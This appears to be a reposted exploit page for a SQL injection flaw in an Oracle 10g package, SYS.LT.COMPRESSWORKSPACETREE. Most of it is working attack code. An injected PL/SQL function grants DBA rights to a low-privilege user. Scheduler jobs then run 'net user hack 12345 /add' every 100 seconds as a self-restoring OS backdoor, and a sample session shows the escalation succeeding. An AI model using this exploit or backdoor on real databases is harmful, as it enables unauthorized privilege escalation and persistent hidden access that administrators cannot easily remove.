Oracle 10g SYS.LT.COMPRESSWORKSPACETREE SQL Injection Exploit
|
来源:http://www.dsecrg.ru 作者:Polyakov 发布时间:2009-01-07
|
|
/*********************************************************/ /*Oracle 10g SYS.LT.COMPRESSWORKSPACETREE SQL Injection Exploit**/ /**grant DBA and create new OS user (using scheduller)***/ /*********************************************************/ /***********exploit grant DBA to scott********************/ /***********and execute OS command "net user"*************/ /***********using scheduler*******************************/ /*********************************************************/ /***********tested on oracle 10.1.0.5.0*******************/ /*********************************************************/ /*********************************************************/ /* Date of Public EXPLOIT: January 6, 2009 */ /* Written by: Alexandr "Sh2kerr" Polyakov */ /* email: Alexandr.Polyakov@dsec.ru */ /* site: http://www.dsecrg.ru */ /* http://www.dsec.ru */ /*********************************************************/ /*Original Advisory: */ /*Esteban Martinez Fayo [Team SHATTER ] */ /*Date of Public Advisory: November 11, 2008 */ /*http://www.appsecinc.com/resources/alerts/oracle/2008-10.shtml*/ /*********************************************************/
select * from user_role_privs;
CREATE OR REPLACE FUNCTION Z return varchar2 authid current_user as pragma autonomous_transaction; BEGIN EXECUTE IMMEDIATE 'GRANT DBA TO SCOTT'; EXECUTE IMMEDIATE 'GRANT CREATE ANY JOB TO SCOTT'; EXECUTE IMMEDIATE 'GRANT CREATE EXTERNAL JOB SCOTT'; COMMIT; RETURN 'Z'; END; /
exec SYS.LT.CREATEWORKSPACE('sh2kerr'' and SCOTT.Z()=''Z'); exec SYS.LT.COMPRESSWORKSPACETREE('sh2kerr'' and SCOTT.Z()=''Z');
/* We create backdored OS user "hack" with password 12345 using External Job's */ /* Note that in this method new user will be created every 100 seconds */ /* so if administrator find it and will try to delete it */ /* user hack will be created again. So it is also a simle backdoor */
BEGIN DBMS_SCHEDULER.CREATE_PROGRAM ( program_name=> 'MyCmd', program_type=> 'EXECUTABLE', program_action =>cmd /c "net user hack 12345 /add", enabled=> TRUE); END; /
BEGIN DBMS_SCHEDULER.CREATE_JOB ( job_name=> 'extjobexec', program_name=> 'MyCmd', repeat_interval=> 'FREQ=SECONDLY;INTERVAL=100', enabled=> TRUE, comments=> 'create backdoor user every 100 seconds'); END; /
/* here we can paste any OS command for example create new user */
exec dbms_scheduler.run_job('extjobexec'); /
select * from user_role_privs;
--------------------------------------------------------------------------------- -----------------------------EXAMPLE OF EXPLOITATION ---------------------------- ---------------------------------------------------------------------------------
SQL> select * from user_role_privs;
USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- OUTLN CONNECT NO YES NO OUTLN RESOURCE NO YES NO
SQL> CREATE OR REPLACE FUNCTION X return varchar2 2 authid current_user as 3 pragma autonomous_transaction; 4 BEGIN 5 EXECUTE IMMEDIATE 'GRANT DBA TO OUTLN'; 6 COMMIT; 7 RETURN 'x'; 8 END; 9 /
Function created.
SQL> exec SYS.LT.CREATEWORKSPACE('zz'' and outln.X()=''x')
PL/SQL procedure successfully completed.
SQL> exec SYS.LT.REMOVEWORKSPACE('zz'' and outln.X()=''x')
PL/SQL procedure successfully completed.
SQL> select * from user_role_privs;
USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- OUTLN CONNECT NO YES NO OUTLN DBA NO YES NO OUTLN RESOURCE NO YES NO
SQL>
|
|
|
[推荐]
[评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|
|
|
|
|
推荐广告 |
|
|
|
|